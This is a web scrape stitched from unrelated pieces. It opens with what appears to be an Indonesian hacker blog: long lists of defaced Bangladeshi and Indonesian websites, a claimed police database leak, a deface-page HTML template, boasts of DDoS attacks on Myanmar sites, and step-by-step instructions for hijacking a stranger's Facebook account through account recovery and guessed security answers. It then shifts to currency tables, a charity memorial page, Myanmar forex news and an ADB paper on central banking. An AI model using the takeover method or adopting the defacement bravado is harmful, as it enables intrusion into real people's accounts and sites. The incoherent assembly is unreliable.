ppdlcom/ 41. http://martbangladesh. com/ 42. http://www. smuct. edu. bd/ 43. http://about-bangladesh. net/ 44. http://new. bcc. net. bd/index. html 45. http://makdesk. com/ 46. http://www. dgfp. gov. bd/ 47. http://www. lasertreat. com. bd/ 48. http://sjbbd. net/ 49. http://lexumnexum. com. bd/ 50. http://www. glarebd. com/ 51. http://www. laxmipurpbs. org. bd/ 52. http://www. bdpc. org. bd/ 53. http://www. fiqryounus. com/ 54. http://globaltourismbd. com/ 55. http://www. msw. gov. bd/ 56. http://demos. innovativesoftbd. com/ 57. http://mediasourcebd. com/ 58. http://intelesys. com. bd/ 59. http://www. epb. gov. bd/ 60. http://webmakerbd. com/ 61. http://raiyangroup. com/ 62. http://brandpulsebd. com/ 63. http://mtm-bd. com/ 64. http://xonex. com. bd/ 65. http://www. zesambd. com/ 66. http://strike10goldbdltd. com/ 67. http://www. thaiairways. com. bd/thaiairways/upload/fuckyou_bd. txt 68. http://www. bmsgsc. edu. bd/ 69. http://www. bdbusinessguide. com/404.php 70. http://www. borneel. com. bd/ 71. http://www. inshapebd. com/ 72. http://www. jnjapparels. com/ 73. http://tricksforearn. com/ 74. http://www. completeseotips. com/ 75. http://www. haircarelive. com/ 76. http://healthflosser. com/ 77. http://www. worldinteract. com/ 78. http://www. dmic. org. bd/dmin/Mr_x. php 79. http://sdp. gov. bd/ 80. more

Bangladesh Police site http://www. rab. gov. bd/ database leaked [ Update 30 july 2013. 02.00 WIB ]

273 Indonesia Site Hacked By Bangladesh Hacker [ Update 30 july 2013. 02.00 WIB ]

1. http://abdee. web. id/index. htm 2. http://www. widis-online. com/index. htm 3. http://obsessionnews. com/index. htm 4. http://inspiro-eo. com/index. htm 5. http://gradmedic. com/index. htm 6. http://cupcakeslucu. com/index. htm 7. http://cottonheavenshop. com/index. htm 8. http://pulsaelektrikppob. com/index. htm 9. http://www. inasport. com/index. htm 10. http://180degreesstore. com/ 11. http://www. apple-diamond. com/ 12. http://oneeightyhomme. com/ 13. http://mamasyifa. com/ 14. http://www. printmate. co. id/ 15. http://jsdaindonesia. org/ 16. http://dprd-penajamkab. go. id/ 17. http://www. whiteskyaviation. co. id/wsa// 18. http://russelrockwell. com/ 19. http://biocompos. co. id/ 20. http://www. griya-aqiqah. com/ 21. http://blog. bungabangsaschool. com/ 22. http://www. gaweweb. com/ 23. http://lelangraya. com/ 24. http://smpn4-bpp. sch. id/ 25. http://nusantarapromocipta. com/ 26. http://gayatangkas. com/ 27. http://mgmppknsmpmts-bpp. org/ 28. http://nurhakimtrans. com/index. php 29. http://www. imaje. co. id/index. htm 30. http://bank-ekadharma. com/index. htm 31. http://bungabangsaschool. com/index. htm 32. http://klawindonesia. com/ 33. http://halma-strategic. com/ 34. http://www. multivisiontower. com/ 35. http://griya-pernakpernik. com/ 36. http://fensontravel. com/ 37. http://sma1banguntapan. sch. id/ 38. http://balisweetresidence. com/ 39. http://plasakebaya. com/ 40. http://www. jalansetapak. org/ 41. http://mybeautyfly. com/ 42. http://www. transportbromo. com/ 43. http://www. sorento-nusantara. com/ 44. http://techvario. com/ 45. http://lcdproperty. com/ 46. http://www. ennodr. com/ 47. http://houseinbandung. com/ 48. http://carimaem. com/ 49. http://www. berkelana. com/ 50. http://azonbookstore. com/ 51. http://tipsbunda. com/ 52. http://bestabsever. net/ 53. http://newonsmartphone. com/ 54. http://apkgamesandroid. com/ 55. http://schematicbuzz. com/ 56. http://ennodr. com/ 57. http://kharismachem. com/ 58. http://indalodge. com/ 59. http://zarrahpanoet. com/ 60. http://www. bestabsever. net/ 61. http://extreme-maintenance. com/ 62. http://optimus-in. com/ 63. http://widenationfirm. com/ 64. http://samudra-sindo. com/ 65. http://balibungapapan. com/ 66. http://anugrah-alam. com/ 67. http://jobfairindo. co. id/ 68. http://fisipups. or. id/ 69. http://agungjies. web. id/ 70. http://smkihyaululumdukun. sch. id/ 71. http://kemejakaos. com/ 72. http://necturajakarta. com/ 73. http://syakirakiddyshop. com/ 74. http://wado-organic. com/ 75. http://www. forexindo. co/ 76. http://kulakanbonekabekasi. com/ 77. http://flstudio-indonesia. com/ 78. http://inigadget. com/ 79. http://jamtangan-alexandrechristie. com/ 80. http://phreakaholic. com/ 81. http://sulaimanjuned. com/ 82. http://hippo-trans. com/ 83. http://tealogue. com/ 84. http://citranayamedika. com/ 85. http://nebengwifi. com/ 86. http://www. marketingsosrosli. com/ 87. http://tokecan. com/ 88. http://www. telur365.com/ 89. http://www. nusafood. com/ 90. http://kenzbifuku. com/ 91. http://www. lintashukum. com/ 92. http://www. syafir. com/ 93. http://midicourse. org/ 94. http://indoshisha. com/ 95. http://townofbag. com/ 96. http://mampirbro. com/ 97. http://tokoalatfitnes. net/ 98. http://mastershared. com/ 99. http://jakartasemesta. com/ 100. http://cakrapalguna. org/ 101. http://pakwis. com/ 102. http://aslitradisional. com/ 103. http://pasarsatu. com/ 104. http://www. pantirehabilitasikap. org/ 105. http://fajarbroadband. com/ 106. http://solidesgroup. com/ 107. http://javalindobuana. com/ 108. http://belanjabukubuku. com/ 109. http://sagatourbali. com/ 110. http://gerejakristenbersinar. com/ 111. http://iyengaryogaindonesia. com/ 112. http://theequityone. com/index. php 113. http://www. tipssales. com/ 114. http://aamg. co. id/ 115. http://purnamanews. com/ 116. http://kusenpintujendelakayu. com/ 117. http://lamalifherbal. com/ 118. http://www. brightcommunication. tv/ 119. http://alcosgrahajaya. co. id/index. php/en/ 120. http://archipelagotrip. com/ 121. http://biocompos. co. id/ 122. http://www. putramatuta. com/ 123. http://www. wins. co. id/ 124. http://www. mis. sch. id/index. html 125. http://gateway. sobatsms. com/ 126. http://www. forexindo. co/ 127. http://ushuluddin. ums. ac. id/ 128. http://pskgj. ums. ac. id/ 129. http://www. pta-semarang. go. id/ 130. http://alisantour. co. id/modules/ 131. http://fkip. ums. ac. id/ 132. http://www. multifit. co. id/ 133. http://www. pt-alisan. co. id/cache/mod_flyout/ 134. http://www. metroweb. co. id/ 135. http://paud. ums. ac. id/ 136. http://pendampingansmk. ums. ac. id/ 137. http://pend-akuntansi. ums. ac. id/ 138. http://www. stikes-megabuana-palopo. ac. id/ 139. http://www. sdmutiarapersada. sch. id/ 140. http://www. smpn2sanden. sch. id/ 141. http://pgsd. ums. ac. id/ 142. http://www. smpn3wates. sch. id/ 143. http://www. sdgedongkuning. sch. id/ 144. http://www. smppiri2yogyakarta. sch. id/ 145. http://www. smkntepus. sch. id/ 146. http://smkbinawiyata. sch. id/ 147. http://mtsn-jogja1.sch. id/poto/x/Hacked. txt 148. http://www. oversindo. com/poto/code/hacked. txt 149. http://ilu. co. id/poto/x/Hacked. txt 150. http://tetige. co. id/poto/x/Hacked. txt 151. http://securecctv. co. id/poto/x/Hacked. txt 152. http://www. bjum. co. id/poto/x/Hacked. txt 153. http://www. mincp. sch. id/poto/x/Hacked. txt 154. http://lp2m. uma. ac. id/poto/x/Hacked. txt 155. http://endrakila. sch. id/poto/x/Hacked. txt 156. http://www. smk-radenpatah. sch. id/poto/x/Hacked. txt 157. http://bluewave. co. id/poto/x/Hacked. txt 158. http://nurhakimtrans. com/ 159. http://rayzahouse. com/ 160. http://jovatech. com/ 161. http://pasarsatu. com/ 162. http://pakwis. com/ 163. http://bpibjakarta. customs. go. id/ 164. http://smknu-lamongan. sch. id/ 165. http://bonekalucu. com/index. htm 166. http://www. johanes. org/ 167. http://msap-unlam. ac. id/ 168. http://bpibjakarta. customs. go. id/ 169. http://fmds. co. id/ 170. http://www. akawulusan. com/ 171. http://www. myinfosys. net/ 172. http://www. rapihadvertising. com/ 173. http://www. skybee. com/ 174. http://yang-me. com/ 175. http://www. wowkids. co. id/ 176. http://wiki-indigo. com/ 177. http://idisumbar. or. id/ 178. http://therapyseft. com/ 179. http://didisupardi. com/ 180. http://hannajilbab. com/ 181. http://alexandrajanice. com/ 182. http://ayanacorp. com/ 183. http://pojok-it. com/ 184. http://indo-carbon. com/ 185. http://teenindonesia. biz/ 186. http://angelbabycare. com/ 187. http://sentralfashion. com/ 188. http://www. pondokforex. com/ 189. http://delisaband. com/ 190. http://ukm-center. com/ 191. http://muliaputratech. com/ 192. http://www. melukis-pelangi. com/ 193. http://chandrachandra. com/ 194. http://konselormenyusui. org/ 195. http://viniatravel. com/ 196. http://posbali. com/ 197. http://plasatimbangandigital. com/ 198. http://eastpoint-apartment. com/ 199. http://www. reenaruu. com/ 200. http://desainyuk. com/ 201. http://almudarrifin. com/ 202. http://www. salsadav. com/ 203. http://ulinhouse. com/ 204. http://riungrempah. com/ 205. http://rumahketjil. com/ 206. http://riuandpartners. com/ 207. http://www. garooskin. com/ 208. http://fitness-ragagym. com/ 209. http://orilook. com/ 210. http://indonesia2028.com/ 211. http://www. mybdg. com/ 212. http://www. obatku. net/ 213. http://solohomeschool. com/ 214. http://duapustaka. com/ 215. http://gbitelagakahuripan. com/ 216. http://fundigital. biz/ 217. http://awajakarta. org/ 218. http://datukpadang. com/ 219. http://dev2.gthendrawinata. com/ 220. http://calcium-d-redoxon. com/ 221. http://fukudagondola. com/ 222. http://ikatuang. com/ 223. http://gkidelima. org/ 224. http://kahmi-sulbar. org/ 225. http://nidhoggindonesia. com/ 226. http://meithasartika. com/ 227. http://pim. webpacific. com/ 228. http://saudath. com/ 229. http://saras-tlp. com/ 230. http://tiprimadata. com/ 231. http://sumber-marine. com/ 232. http://tonikumbayer. com/ 233. http://wp04.webpacific. com/ 234. http://necturajakarta. com/ 235. http://cybereptik. com/ 236. http://solidesgroup. com/ 237. http://drive-expedition. com/ 238. http://www. akawulusan. com/ 239. http://pernik-pernik. com/ 240. http://www. akawulusan. com/ 241. http://www. akawulusan. com/ 242. http://al-aqsha. info/ 243. http://mediaasuransinews. com/ 244. http://www. inforengasdengklok. com/ 245. http://4pilar-outbound. com/ 246. http://figur. co. id/ 247. http://www. nlp-spot. com/blog/ 248. http://neworimarru. com/ 249. http://tsaratravel. com/ 250. http://www. nlp-spot. com/ 251. http://saridinda. com/ 252. http://intimarina. com/ 253. http://tibitravel. com/ 254. http://parokikranji. org/ 255. http://dsh. co. id/ 256. http://iesjakarta. org/ 257. http://akacn. ac. id/ 258. http://pbep. co. id/ 259. http://djpsdkp. kkp. go. id/ 260. http://www. abacus-ind. co. id/indur. html 261. http://www. careminders. com/panamacity/ 262. http://mataharibaliproperty. com/ 263. http://agungtourasiaguide. com/ 264. http://neusu. com/ 265. http://ekaunsyiah. com/ 266. http://pa-bawean. go. id/ 267. http://pa-parepare. go. id/ 268. http://www. nlp-spot. com/ 269. http://www. mrmspresidentuniversity. com/ 270. http://pa-barru. go. id/ 271. http://www. pn-karanganyar. go. id/ 272. http://cts. pn-karanganyar. go. id/ 273. http://cts2.pn-karanganyar. go. id/

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Please Read This [ OUR BROTHER ]

SalDreX Newbie

cara yang pertama, kita pake kelemahan dari system FB dulu yaitu celah di

langsung aja gak usah pake basa basi

siapin dulu bahan bahannya :

-buka profil FACEBOOK target, catat emailnya(kalo ada)serta semua info-info(tanggal lahir, alamat, nomor hp, pokoknya semua yang ada di profil target),kalo gak ada emailnya. catat nomor idnya / usernamenya.

nomor id yang mana. misal: http://www. facebook. com/profile. php? id=100002382640672 berarti nomor idnya adalah:100002382640672

username yang mana. misal: http://www. facebook. com/whazheenk. gantenk berarti username nya adalah: whazheenk. gantenk

-buka komputer lalu masuk ke FACEBOOK HACKED (tapi jangan login dulu. )

lalu klik amankan akaun

-masukan username/nomor id/emailnya

-klik ini akaun saya

-masukan password (pake password acak saja)

-kalo udah gagal XD, baru klik tidak punya akses kesini lagi

-masukan email barumu(yang nantinya akan digunakan untuk login ke FB target)

-tebak kata sandi pertanyaan keamanan yang ada di FB target(untuk referensi jawaban bisa dilihat di INFO di profil target)

-misalkan jawaban yang dimasukkan bener, maka langsung ada konfirmasi untuk penggantian password

-kalo udah diisi nanti dapat notif kayak gini

Selamat, Anda telah berhasil membuktikan identitas anda

Email dikirim ke penembusmaya@gmail. com. Klik tautan dalam email tersebut untuk melanjutkan

proses pemulihan akun

kalo misalkan udah kita buka EMAIL yg kita Masukkan Tadi.

check INBOX nya.

langsung aja klik tautan yang ada di inbox dari FB untuk melanjutkan proses pemulihan

Tapi jangan seneng dulu masberoooo. harus nunggu 24 jam, baru bisa membuka FB si target tadi

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<HTML> <head> <title>#Hacked By MR.2nD </title> </head> <body BGCOLOR="black"> <center><font face="Comic Sans MS" color="Cyan"><FONT SIZE=6>Script Deface Simple By MRR Cyber</FONT></FONT></center> <center><img src="http://lh3.googleusercontent. com/-dmO82UkC13c/AAAAAAAAAAI/AAAAAAAAALI/1R7IC1_y-m4/s512-c/photo. jpg" width="860" height="264""><center> <marquee><font class="WhiteGlow"><font color='lime' face='Comic Sans Ms'><b> Tips. Huruf Ini Dan Diatas Bisa Kamu Edit Sesuai Keinginan Hati Kamu </b></b></font></font></marquee> </body> </HTML> 3. Lalu Save & Simpan Dimana Saja. File Name Terserah Kamu, Save As Type Pilih HTML. 4. Cara Pengecekan Klik 2x. html yang kamu simpan tadi 5. Hasil Seperti Ini

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hay kawan kawan member blog SalDreX Newbie, mkasih ya atas kunjunganya :-]. kli ini gw akan share perang Hacker antara Indonesia Vs Myanmar, brikut cuplikanya:

[ Hacker News ] Perang Hacker Indonesia vs Myanmar

Perang Hacker Indonesia vs Myanmar - MRR Cyber

Sengaja Kami Update Lagi.. Karena Link Dahulu. Erorr Maka Dari Itu Saya Mem-BackUpnya Lagi. )

Beberapa Hari Lagi Hackvisit atau Aktivitas Hacker. Termasuk Saya Ingin Membela Negaranya Sendiri INDONESIA Walaupun Saya Masih Newbie Hacker. Saya Mengeluarkan Semampu Saya Seperti Men-DDoS Website Myanmar.. Myanmar Juga Pernah Men-Deface Website Website Indonesia Dengan Mengisi Script Dengan Mengejek Islam. [ Semoga ALLAH SWT. Melaknatkanya ] Hacker Indonesia Telah Berjuang Semampunya Mempertahankan Serangan Myanmar & Menyerang ISP Website Myanmar

Myanmar Lebih Mudah Men-Deface Website Indonesia Karena Indonesia Mempunya domain Google " google. co. id " Jadi Myanmar Lebih Mudah Mencari Target. Sedangkan Myanmar TIdak Mempunyai Fasilitas Google dan Website Myanmar Pun Sedikit..

Terakhir Salah Satu Situs Website Myanmar Yang Sudah Down Secara Bergotong Royong :D

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Currency Exchange for Мьянма кьята to Франки КФА ЦБЗАГ | MMK to XOF

Change 301225 Мьянма кьята = 146200.54 Франки КФА ЦБЗАГ

Change 602450 Мьянма кьята = 292401.08 Франки КФА ЦБЗАГ

Change 3012250 Мьянма кьята = 1462005.40 Франки КФА ЦБЗАГ

Change 6024500 Мьянма кьята = 2924010.79 Франки КФА ЦБЗАГ

15061250 MMK = 7310026.99 XOF

Change 15061250 Мьянма кьята = 7310026.99 Франки КФА ЦБЗАГ

30122500 MMK = 14620053.97 XOF

Change 30122500 Мьянма кьята = 14620053.97 Франки КФА ЦБЗАГ

60245000 MMK = 29240107.94 XOF

Change 60245000 Мьянма кьята = 29240107.94 Франки КФА ЦБЗАГ

301225000 MMK = 146200539.70 XOF

Change 301225000 Мьянма кьята = 146200539.70 Франки КФА ЦБЗАГ

602450000 MMK = 292401079.40 XOF

Change 602450000 Мьянма кьята = 292401079.40 Франки КФА ЦБЗАГ

3012250000 MMK = 1462005397.02 XOF

Change 3012250000 Мьянма кьята = 1462005397.02 Франки КФА ЦБЗАГ

6024500000 MMK = 2924010794.03 XOF

Change 6024500000 Мьянма кьята = 2924010794.03 Франки КФА ЦБЗАГ

30122500000 MMK = 14620053970.20 XOF

Change 30122500000 Мьянма кьята = 14620053970.20 Франки КФА ЦБЗАГ

60245000000 MMK = 29240107940.30 XOF

Change 60245000000 Мьянма кьята = 29240107940.30 Франки КФА ЦБЗАГ

301225000000 MMK = 146200539702.00 XOF

Change 301225000000 Мьянма кьята = 146200539702.00 Франки КФА ЦБЗАГ

6024500000000 MMK = 2924010794030.00 XOF

Change 6024500000000 Мьянма кьята = 2924010794030.00 Франки КФА ЦБЗАГ

How much is Франки КФА ЦБЗАГ in Мьянма кьята (XOF in MMK)? See XOF MMK Rate.

In Memoriam

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Many of us have suffered a loss in recent years and even when we are well prepared, we feel a sense of helplessness in our sadness - wanting in some way to preserve the memory of a loved one and also wanting something positive to come out of this time of sadness.

CBM have teamed up with a website called MuchLoved who offer a free service to our supporters to express their feelings about their loved ones in words, pictures, music, or video.

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We are so grateful for every donation we receive; especially those given instead of flowers at funeral services; bringing sight and hope to children and families in the developing world. MuchLoved also provide ways of making a donation online for those who cannot attend the funeral, and provide a platform to fundraise in memory of a loved one.

What could my In Memoriam gift buy?

£30 could pay for a supportive chair for a child with Cerebral Palsy. You can give that child – who would otherwise be lying flat on his or her back – the chance to sit up and discover the world. In developing countries children with severe disabilities are often neglected, so your gift may be an absolute lifeline for a child with cerebral palsy.

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It not only causes physical trauma, but the long term negative emotional effects can be overwhelming. - See more at: http://www. cbmuk. org. uk/fistula#sthash. SwOQRigM. dpuf

We can provide collection boxes, ready printed cards and freepost envelopes explaining your preference. Another advantage of asking people to donate to CBM directly is that there will be less for you to do at a time that you probably have more than enough to cope with.

Create an online tribute

CBM can also provide another way to create a continuing and very personal tribute to your loved one. Through our partners JustGiving and MuchLoved. com it is possible to create a memorial webpage dedicated to your loved one where friends and family from around the world can come together to share their special memories.

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It is also possible to raise funds for CBM's important work through the memorial page if you wish to do so. For example, some of our members prefer to ask friends and family to donate to CBM in lieu of flowers.

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Foreign exchange gap widens

March 18, 2015 by thiha

The official reference rate for dollar-kyat exchange maintained by the Central Bank of Myanmar and the rate charged by unofficial moneylenders are increasingly diverging.

While the Central Bank’s reference figure has sat at K1027 per dollar since the end of February, at many informal traders the kyat has depreciated to around K1075 per dollar.

Divergent rates show the Central Bank is still developing its position in the market, experts say. “This shows the Central Bank does not control the market, and there will be some impacts in the money market,” said Asia Green Development Bank executive director U Soe Thein.

The Central Bank and related financial institutions should work to build their influence over the market, he added.

Measures such as higher interest rates on bank deposits would strengthen Myanmar’s currency, but with a growing budget and trade deficit and continued strength in the US dollar, experts say the kyat may continue to weaken in the short-term. The reference rate is officially set by the daily auctions conducted by the Central Bank and authorised domestic dealers.

Yangon Foreign Exchange Market Committee chair U Mya Than said local banks rely on the reference rate for their operations – however, if the rate is not realistic, customers will look outside the banks. Most commercial banks currently have small supplies of foreign currency and generally rely on supply from the Central Bank through the daily auctions.

The informal forex trade has shrunk considerably since a May 2012 move from an unofficial peg against Special Drawing Rights, was widely derided as unrealistic, to a managed float.

However, informal currency dealers have not disappeared completely, providing an alternative to businesses looking for better rates than can be obtained from commercial banks.

U Mya Than said the Central Bank appears to be stubborn on exchanges rates and moving in the wrong direction.

“The rate should be set by supply and demand of the market. We cannot deny the US dollar is strengthening internationally, and this should be reflected in the auction mechanism,” he said.

Although Central Bank of Myanmar officials declined to comment on the record, one official said the growing gap is a matter of discussion. The Foreign Exchange Management Department is currently holding internal talks on the issue, and has yet to share a broader strategy within the bank.

Ministry of Commerce trade promotion director U Win Myint said the weaker local currency encourages exports and decreases imports.

“We expect the informal market will be kept alive by exporters selling their forex back into the market,” he said.

Source: Myanmar Times

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Do you know that IE Singapore is giving up to SGD 20,000 support for Singapore company to venture into Myanmar? Para obtener más información, haga clic aquí

March 4, 2016 by thiha

IMPORTS to Myanmar reached an all time high of US$13.6 billion this January, up $162 million from the previous year, according to an official from the Ministry of Commerce. The import volumes for this fiscal year were valued at US$13.6 billion according to figures received this year until the end of January, said Director U […]

February 25, 2016 by thiha

YANGON – The United Kingdom is seeking closer trade engagement with Myanmar, with US$300-million (Bt10.72 billion) in export financing to boost direct exports as well as drive infrastructure projects that require notable UK content. UK Transport Minister Lord Ahmad was here last Friday to unveil the export-finance facility, which will be extended directly to British […]

December 25, 2015 by thiha

Exporters and importers must use banks for foreign currency transactions, according to new government regulations. The new rules would be another step toward a functioning interbank currency market, but bankers are doubtful they can be immediately enforced. The government amended its 2012 Foreign Exchange Management Law last week to prevent exporters from selling foreign currency. [& Hellip;]

November 3, 2015 by Thiha

In the last nine months, 35,282 parking space recommendations, which proves that a car importer has sufficient space to park the car, have been issued, according to the Ministry of Commerce. Under a new law, introduced in January this year, an individual importer or a company who apply for a car import licence need a […]

October 15, 2015 by Thiha

Local poultry farmers want government to limit the import of chickens in order to keep local farmers competitive, according to the Myanmar Poultry Business Association. “We don’t want local businesspeople to suffer. Foreign chicken imports should be limited. If Myanmar imports too much, the local market will get affected. I intend to protect this,” Dr […]

July 17, 2015 by Thiha

There are not enough fishery products in the country even though there is demand from abroad, U Tun Aye, chairman of Myanmar Fisheries Products Exporters Association, said. He was speaking at a meeting of Myanmar Fisheries Federation (MFF). “Japan is ready to buy as many Myanmar fishery products as possible. But the fishes are not […]

Disappointing trade numbers released this month are due to border conflict and uncertainty over the minimum wage and currency devaluation, according to officials from the Ministry of Commerce. In 2015-16 fiscal year until June, maritime trade stood at $4.34 billion and border trade at $1.43 billion, for a total of over $5.77 billion of foreign […]

Mushrooms produced in Myanmar will soon be exported to South Korea and Singapore, according to Myanmar Mushroom Producers and Traders Group. U Nay Win, chairman of the group, said that Myanmar mushroom manufacturers had fruitful discussions with interested parties with South Korea and Singapore who are interested in importing mushrooms in big quantities from Myanmar. [& Hellip;]

June 12, 2015 by thiha

Legal exports of rice to China must include rice bags printed in Chinese language, according to an official from the Myanmar Rice Federation (MRF). The export of rice occurs mainly through the Muse border, where legal exports have recently started, but most rice passes through unsanctioned and illegal trade routes. According to the an agreement […]

June 12, 2015 by thiha

Fish, prawns and chicken meat are being smuggled over the border in shipping containers from Thailand, according to a letter of complaint from the Kayin State Fisheries Association to the Myanmar Livestock Federation (MLF). “Prices of chicken and fish are high in Myanmar but prices outside of the country are low. There are containers coming […]

MonEtARy PoliCy AnD FoREign ExChAngE MAnAgEMEnt: REFoRMing CEntRAl BAnk FunCtions in MyAnMAR


1 MonEtARy PoliCy AnD FoREign ExChAngE MAnAgEMEnt: REFoRMing CEntRAl BAnk FunCtions in MyAnMAR Bandid Nijathaworn, Suwatchai Chaikhor, Suppakorn Chotika-arpa, and Suchart Sakkankosone no. 431 may 2015 adb economics working paper series ASIAN DEVELOPMENT BANK

2 ADB Economics Working Paper Series Monetary Policy and Foreign Exchange Management: Reforming Central Bank Functions in Myanmar Bandid Nijathaworn, Suwatchai Chaikhor, Suppakorn Chotika-arpa, and Suchart Sakkankosone No. 431 May 2015 Bandid Nijathaworn (bandidn@bot. or. th) is President and Chief Executive Officer, Thai Institute of Directors. Suwatchai Chaikhor (SuwatchC@bot. or. th) is Division Chief, International Department, Monetary Policy Group, Bank of Thailand. Suppakorn Chotika-arpa (SuppakoC@bot. or. th) is Team Executive, International Strategy Division, International Department, Monetary Policy Group, Bank of Thailand. Suchart Sakkankosone (suchart53@gmail. com) is Former Senior Director, Monetary Policy Department, Bank of Thailand. This was a background paper for the Asian Development Bank Myanmar Country Diagnostics Study. ASIAN DEVELOPMENT BANK

3 Asian Development Bank 6 ADB Avenue, Mandaluyong City 1550 Metro Manila, Philippines www. adb. org 2015 by Asian Development Bank May 2015 ISSN 2313-6537 (Print), 2313-6545 (e-issn) Publication Stock No. WPS157285-2 The views expressed in this paper are those of the authors and do not necessarily reflect the views and policies of the Asian Development Bank (ADB) or its Board of Governors or the governments they represent. ADB does not guarantee the accuracy of the data included in this publication and accepts no responsibility for any consequence of their use. By making any designation of or reference to a particular territory or geographic area, or by using the term country in this document, ADB does not intend to make any judgments as to the legal or other status of any territory or area. Note: In this publication, $ refers to US dollars. The ADB Economics Working Paper Series is a forum for stimulating discussion and eliciting feedback on ongoing and recently completed research and policy studies undertaken by the Asian Development Bank (ADB) staff, consultants, or resource persons. The series deals with key economic and development problems, particularly those facing the Asia and Pacific region; as well as conceptual, analytical, or methodological issues relating to project/program economic analysis, and statistical data and measurement. The series aims to enhance the knowledge on Asia s development and policy challenges; strengthen analytical rigor and quality of ADB s country partnership strategies, and its subregional and country operations; and improve the quality and availability of statistical data and development indicators for monitoring development effectiveness. The ADB Economics Working Paper Series is a quick-disseminating, informal publication whose titles could subsequently be revised for publication as articles in professional journals or chapters in books. The series is maintained by the Economic Research and Regional Cooperation Department.

4 CONTENTS TABLES AND BOXES ABSTRACT iv v I. INTRODUCTION 1 II. LAYING A MACRO POLICY FOUNDATION TO SUPPORT A MARKET-BASED ECONOMY 6 III. FOREIGN EXCHANGE FRAMEWORK, OPERATION, AND EXCHANGE CONTROL 8 A. Limitations of the Foreign Exchange Auction 9 B. Moving to More Effective Foreign Exchange Management 10 C. Capital Account Liberalization and Managing Capital Flows 10 D. Sequencing Capital Account Liberalization 12 E. Access to Foreign Exchange: New Rules and Regulations 13 F. Reserve Management and Settlement 14 G. Balancing Exchange Rate Flexibility and Safeguards 16 IV. MONETARY POLICY FUNCTIONS AND OPERATION 17 A. Macro Context of the Monetary Policy Challenge 17 B. Monetary and Exchange Rate Policy 17 C. Reserve Money Targeting and Operating Procedures 19 D. Transmission Mechanism and Money Market Development 21 E. More Policy Tools Are Needed for Liquidity Management 22 F. Data Requirements for Monetary Policy 24 G. Establish a Clear and Transparent Monetary Policy Process 25 H. Monetary and Fiscal Policy Coordination 25 V. CENTRAL BANK OF MYANMAR AS LENDER OF LAST RESORT AND ITS DEVELOPMENT ROLE 26 A. Financial Stability and Lender of Last Resort 26 B. Payment System Oversight 29 C. The Central Bank of Myanmar s Development Role 30 VI. OPERATIONAL STRUCTURE AND CAPACITY BUILDING 30 VII. CONCLUSION 34 BIBLIOGRAPHY 35

5 TABLES AND BOXES TABLES 1 Myanmar s Key Economic Indicators, FY2000 FY2010 4 2 Reserve Management, Tranches 14 3 Financial Indicators, Myanmar, and Its Neighbors 18 BOXES 1 Recent Banking and Financial Reforms 2 2 Preconditions for Safe Capital Account Liberalization 11 3 A Strategy for the Central Bank of Myanmar s Reserve Management and Operational Arrangement 15 4 Monetary Policy Tools 19 5 Reserve Money Targeting and Implementation 20 6 Money Markets and Infrastructure Needs 23 7 Guiding Principles for Data Management 33

6 ABSTRACT Myanmar s macroeconomic policy framework does not adequately support the new functions of the Central Bank of Myanmar. The monetary policy regime is deficient and institutions that complement the working of a market-based economy lacking. This paper identifies 10 priority areas for reform to allow the central bank to effectively perform its emerging new functions in support of economic growth and stability. This is a three-front effort: dismantle nonmarket arrangements, especially in the finance sector; implement a monetary policy framework and operational procedures, including financial markets development; and enhance central bank policy capacity. The latter includes elevating the policy process, central banking functions, and institutional roles to match the tasks of a modern monetary authority in a market-based economy. Keywords: central bank, financial markets, monetary policy, Myanmar JEL Classification: E51, E52, E58

7 I. INTRODUCTION Myanmar s current macroeconomic policy framework, especially concerning the conduct of monetary policy, is not supportive of a modern market economy. The main deficiencies are in the current settings of monetary policy and the lack of institutions that complement a functioning market-based economy. As a result, the economy has been operating within the limits of its own deficiencies and structural constraints. The main ones are (i) the closed structure of the economy, marked by the government s dominant role in economic decisions and resource allocation; (ii) an almost cash-based economy with a limited banking sector that impedes financial intermediation and investment; and (iii) a severe shortage of institutional capacity and human resources in the government and private sector. As a result, the economy is heavily reliant on informal markets. In the context of macro policy, a major deficiency lies in an outdated macroeconomic policy framework that relies overwhelmingly on government s nonmarket intervention, as opposed to market signals, to guide economic activity and resource allocation. Prior to the reform, the government s fiscal operations were extensive and the Central Bank of Myanmar (CBM), as a unit of the Ministry of Finance (formerly the Ministry of Finance and Revenue), financed the fiscal deficits. The strong presence of the government was also evident in the central roles that state banks play in the economy s foreign exchange market and in credit allocation. Such structures blunt economic incentives and shaped the pattern of financial resource use in the economy. The cost of these deficiencies has been large, both to economic performance, relative to what could have been achieved, and in the government s ability to support the private sector and maintain price stability. Myanmar s macroeconomic data from 2000 to 2010, summarized in Table 1, confirm this. Myanmar s annual gross domestic product (GDP) growth from 2000 to 2010 averaged 4.71%, compared to the Association of Southeast Asian Nations (ASEAN) average of 5.16% over the same period. 1 Myanmar s GDP growth was driven largely by an output expansion in agriculture and extractive industries the mainstays of the country s production and exports. Private sector investment was weak, held back by poor incentives, an unfavorable business environment, and restricted access to foreign exchange. Private consumption, meanwhile, was constrained by the low growth of household incomes and widespread poverty. International trade and investment has been held back by limited access to foreign exchange and economic sanctions. The latter, which severely depressed trade, investment, and international payments transfer, isolated Myanmar for more than 5 decades from the global economy. Guided by the Export First policy to preserve foreign exchange by balancing import payments with export proceeds under an unrealistic fixed exchange rate, a system for foreign exchange allocation was introduced in July 1997. This operated via a major state bank Foreign Trade Bank that pooled all the foreign exchange from export earnings and allocated them to import payments through bilateral negotiations for foreign exchange between importers and exporters. The system effectively sidelined the country s private commercial banks from the largest part of the foreign exchange business, and clearly favored the government, state enterprises, and those of certain businesses. The rest of the economy, meanwhile, had to rely on the informal markets for foreign exchange. This arrangement distorted the economy in a large way, resulting in slow growth in exports and imports, with official reported trade remaining roughly in balance. 1 Calculated based on the International Monetary Fund (IMF) country reports for Myanmar, Article IV Consultation (various years); and World Bank, World Development Indicators for ASEAN.

8 2 ADB Economics Working Paper Series No. 431 Because of subdued private sector activity, domestic demand has been the main driver of government expenditure. Given weak tax revenue (because of the low tax base), this has been financed mainly through central bank borrowing. Monetization of the fiscal deficits has sharply expanded the money supply and, in the absence of a policy to limit monetary growth, the CBM s ability to control inflation was seriously compromised. As a result, domestic inflation rose to 34% in 2001 and 58% in the following year, further depressing private spending and economic incentives. Economic reforms launched from 2010 aimed to correct these distortions and lay down the legal framework for the development of a market-based economy. The reform agenda focused on the finance sector and included measures to further liberalize the scope of business of commercial banks, improve the operations of the CBM and the foreign exchange market, and introduce new legislation on foreign investment and the operational autonomy of the CBM. Box 1 shows the reforms. Box 1: Recent Banking and Financial Reforms Since President Thein Sein came to power in 2011, a wide range of economic reforms have been implemented and are ongoing. The following looks at reforms in the banking and 